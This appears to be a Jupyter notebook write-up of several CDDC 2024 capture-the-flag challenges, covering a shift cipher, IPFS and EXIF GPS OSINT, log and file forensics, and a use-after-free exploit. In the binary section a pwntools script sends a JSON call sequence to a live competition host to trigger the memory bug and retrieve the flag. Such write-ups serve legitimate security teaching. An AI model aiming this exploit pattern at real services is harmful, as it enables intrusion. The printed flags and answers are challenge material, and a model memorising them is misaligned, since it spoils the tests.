# Crypto 2 (50 pts)

#### Decrypt the given string: FGGF24{FK3FN_0XW_WK3_Q3Z_P0Y13_DW_8SP}
* This is a basic substitution cipher with a shift of 3 letters from C to F.
* Reversing the shift returns the decoded flag: **<span style="color:red"> CDDC24{CH3CK_0UT_TH3_N3W_M0V13_AT_8PM}</span>**.

In [1]:
string = 'FGGF24{FK3FN_0XW_WK3_Q3Z_P0Y13_DW_8SP}'
string2 = ''

for i in string:
    if i.isalpha():
        string2+=chr(ord(i)-3)
    else:
        string2+=i

print(string2)

CDDC24{CH3CK_0UT_TH3_N3W_M0V13_AT_8PM}


# OSINT 1 (250 pts)

#### A string is given. Find the flag from it. Some other clues are given eg. flag{landmark} 
* String: bafybeicjfojuswk3uzb54f76qxmwcfkf7tpf3lxg6u36mazkjk5a2gtybq
* Analysis by Gemini 1.5 Pro reveals that the string is a IFPS content identifier (CID).

**Obtaining Content from IFPS CID**
* Select a random hostname using https://ipfs.github.io/public-gateway-checker/.
* Replace the content after the last slash in the hostname with the given IFPS CID eg:

    https://cloudflare-ipfs.com/ipfs/bafybeifx7yeb55armcsxwwitkymga5xf53dxiarykms3ygqic223w5sk3m
* The modified URL can now be used to access the IPFS content on the link, which is a 1.3GB zip file containing 1000 photos of money bags.

**Photo Analysis**
* https://www.aperisolve.com/ was used to check for any information embedded in the images.
* GPS data was found to be present in the `exiftool` tab.
* A local `exiftool` command was used to extract GPS locations of all images in the extracted zip and dump them into a text file for further analysis:
    
    `exiftool -location:all -G -a -s moneys > locations.txt`

**Further Analysis of GPS Locations**
* Dumped GPS locations in the text file are as follows:

    ![image-2.png](attachment:image-2.png)

* The composite GPS position was extracted and converted to the format: '[number]N, [number]E'
* S and W are converted to their counterparts using a negative sign eg. 40S, 35W --> -40N, -35E using the functions below:

In [1]:
arr = []
with open('./Resource_files/locations.txt', 'r') as file:
    for line in file:
        if 'GPSPosition' in line:
            # Split the line by ':' and remove leading/trailing whitespace
            parts = line.split(':')[1].strip()
            # Split the coordinates into latitude and longitude
            latitude, longitude = parts.split(',') 
            # Convert to decimal degrees

            # print(latitude)
            def convert_to_decimal(coordinate_str):
                parts = coordinate_str.split(" ")
                # print(parts)
                degrees = parts[1].replace('deg', '')
                minutes = float(parts[2].replace("'", "")) / 60
                seconds = float(parts[3].replace("\"", "")) / 3600

                return float(parts[0]) + minutes + seconds

            lat_decimal = convert_to_decimal(latitude)
            lon_decimal = convert_to_decimal(longitude.strip())
            
            # Format the coordinates as "44.150928N, 171.471131W"
            formatted_coords = f"{lat_decimal:.6f}{latitude.split()[-1]}, {lon_decimal:.6f}{longitude.split()[-1]}"
            arr.append(formatted_coords)

print(arr[:5])

['44.150928N, 171.471097W', '25.994686S, 74.171047E', '21.862239S, 76.433853E', '19.909844S, 71.955761E', '18.405528S, 73.778533E']


In [2]:
# Example array for testing purposes
# arr2 = ['44N,171W', '25S,74E', '21S,76E']

converted_arr = []
for item in arr:
  latitude, longitude = item.split(',')
  latitude = latitude.strip()
  longitude = longitude.strip()
  if 'N' in latitude:
    latitude = latitude[:-1]
  elif 'S' in latitude:
    latitude = '-' + latitude[:-1]
  if 'E' in longitude:
    longitude = longitude[:-1]
  elif 'W' in longitude:
    longitude = '-' + longitude[:-1]
  converted_arr.append((float(latitude), float(longitude)))

print(converted_arr[:5])

[(44.150928, -171.471097), (-25.994686, 74.171047), (-21.862239, 76.433853), (-19.909844, 71.955761), (-18.405528, 73.778533)]


* To check if the location corresponds to the location of a landmark, two methods can be used:
    1. Google Maps API
    2. global_land_mask Python library
* The Google Maps API took a long time to run for 1000 locations and was only tested on a partially working dataset of coordinates (I accidentally ignored the conversion of degrees and seconds for longitude and latitude) before the second method was discovered, thus it was abandoned.

* It was discovered that the obtained GPS locations mostly correspond to areas in the ocean, thus the global_land_mask library, which was used to check if a specific latitude and longitude corresponds to a place on land or ocean, suits the task very well.


In [4]:
from global_land_mask import globe

land = []

for i in converted_arr:
    #true = onland false=sea
    if globe.is_land(i[0], i[1]):
        land.append(i)

print(land)

[(27.175144, 78.042144)]


* The final array yields a single result **(27.175144N, 78.042144E)**, which corresponds to the location of the Taj Mahal.
* **<span style="color:red"> Flag:  CDDC24{taj_mahal}</span>**

**Attempted Usage of Google Maps Api**

In [4]:
import os
from dotenv import load_dotenv, dotenv_values 
import requests
import json

#load env variables
load_dotenv()
# Setting API Key (from .env file) and selecting model
api_key=os.environ["API_KEY"]

In [5]:
def get_landmark_from_coordinates(location_list):
  """
  Gets the landmark represented by a list of latitude and longitude locations.

  Args:
    location_list: A list of location strings in the format "latitudeN,longitudeW".

  Returns:
    A dictionary mapping locations to their potential landmarks.
  """

  landmark_dict = {}

  for location in location_list:
    print(location)
    latitude, longitude = location[0], location[1]

    url = f"https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={latitude},{longitude}&radius=1000&key="

    response = requests.get(url)
    data = json.loads(response.text)

    landmarks = []

    if data['status']!='ZERO_RESULTS':
      for result in data.get("results", []):
        landmarks.append(result.get("name"))

      landmark_dict[location] = landmarks

  return landmark_dict


In [None]:
# Example usage:
landmark_dict = get_landmark_from_coordinates(converted_arr)

# for location, landmarks in landmark_dict.items():
#     print(f"Location: {location}, Potential Landmarks: {landmarks}")

with open('final_locations.txt','w') as file:
  for location, landmarks in landmark_dict.items():
    # print(f"Location: {location}, Potential Landmarks: {landmarks}")
    try:
      file.write(f"Location: {location}, Potential Landmarks: {landmarks}\n")
    except:
      continue

# System Binary Vulnerability 1 (100 pts)

#### A netcat command is given. Upon entering the command into a shell, the remote program prints: "Crash Me!"
* The given files include a main .py file, which has references to a **crashMe.so** file containing several C functions that are called in the .py file.
* From `json.loads`, we know that the expected input is a json string.

    ![image-3.png](attachment:image-3.png)

* Ghidra is used to decompile **crashMe.so**, which reveals many different functions : getflag( ), getNum( ), getString( ), delNum( ), delString( ), setNum( ) and setString( ). 
*  Several of these functions are found to create a vulnerability when called sequentially.
* The order is as follows:
    1. setString( ): allocates and stores string content
    2. delNum( ): does nothing if string has not been init, else frees the memory occupied by the string.
    3. getNum( ): tries to free the sample memory address --> **leads to undefined behaviour, calling getflag( ) and returning the flag.**
* The decompiled code of these functions are displayed below:

    ![alt text](<./Pictures/Screenshot 2024-05-31 225927.png>)

* There are 2 methods to send commands to the remote server that can call these functions:
    1. Netcat terminal commands
    2. Pwntools + python

* The second method will be used as it can be extended easily to incorporate more complicated scripts:
    * The pwntools library is imported to enable communication with the remote server.
    * This allows us to send json commands that call the abovementioned vulnerable functions, revealing the flag: **<span style="color:red"> CDDC24{Y0u_L34rN3D_US3_4f73r_Fr33}</span>**.

In [6]:
import base64
import json
from pwn import *

In [67]:
io = remote('cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com', 19754)

received_message = io.recvlines(1)
print(received_message)

#setnum
message = json.dumps({"callNum": 1,"args":['AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa01011b4']})

io.sendline(message)
received_message = io.recvlines(1)
print(received_message)

#del num --> frees memory from a specific memory address
message = json.dumps({"callNum": 3,"args":['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA']})

io.sendline(message)
received_message = io.recvlines(1)
print(received_message)

#get num --> tries to free the memory from the same memory address which leads to undefined behaviour, giving the flag.
message = json.dumps({"callNum": 2,"args":['abc']})

io.sendline(message)
received_message = io.recvlines(1)
print(received_message)

io.close()

[x] Opening connection to cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com on port 19754
[x] Opening connection to cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com on port 19754: Trying 47.129.66.140
[+] Opening connection to cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com on port 19754: Done
[b'Hello! CrashMe!']
[b'Done']
[b'Done']
[b'CDDC24{Y0u_L34rN3D_US3_4f73r_Fr33}']
[*] Closed connection to cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com port 19754


  io.sendline(message)
  io.sendline(message)
  io.sendline(message)


# Forensics 1 (50 pts)

#### A story about a student who has stolen an exam paper, sent it via email and logged out but gets caught is given. The student is wondering what evidence was left behind. Use the given zip file to find evidence of the stolen exam paper. The flag is of form CDDC24{filename without extension}.
* Binwalk was used to recursively extract the contents of the given zip file:

    `binwalk -Me Student+A_s+head.zip`
* The following Linux CLI command was used to find files that could represent the exam paper:

    ```
    find . -type f -exec grep -q -i "exam" {} \; -print
    ```

* The search results are shown below:

    ![image.png](attachment:image.png)

* Inpsecting each file reveals the first to be the flag: **<span style="color:red"> CDDC{harmony_valley_high_school_midterm_exam}</span>**.

# Forensics 4 (100 pts)

#### Given a log file, find the access time of the largest successful download.

* The given log file has the following format:

    ![image.png](attachment:image.png)

* GPT4-o was used to refine code from Gemini 1.5 Pro which returned the answer immediately.

In [5]:
import re
from collections import defaultdict

def analyze_log(log_file):
    """Analyzes the log file and returns the access time of the largest file
    successfully downloaded by the IP with the most successful requests.
    """
    ip_counts = defaultdict(int)
    successful_downloads = defaultdict(list)

    with open(log_file, "r") as file:
        for line in file:
            # Extract IP address, request method, status code, and file size
            match = re.match(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}) - - \[(.*?)\] \"(GET|POST|PUT|DELETE) .*?\" (\d{3}) (\d+)", line)
            if match:
                ip, timestamp, method, status_code, file_size = match.groups()
                status_code = int(status_code)
                file_size = int(file_size)
                
                # Count successful requests per IP
                if status_code == 200:
                    ip_counts[ip] += 1
                    successful_downloads[ip].append((file_size, timestamp))

    # Find IP with most successful requests
    most_requests_ip = max(ip_counts, key=ip_counts.get)

    # Find the largest successful download for that IP
    largest_download = max(successful_downloads[most_requests_ip], key=lambda x: x[0])

    access_time = largest_download[1]
    return access_time

# Example usage
log_file = "access.log"
access_time = analyze_log(log_file)
print(f"Access time of the largest successful download: {access_time}")


Access time of the largest successful download: 13/Apr/2024:13:02:27 +0000


* The access time is then converted to the required flag format: **<span style="color:red"> CDDC24{20240413_13:02:27}</span>**.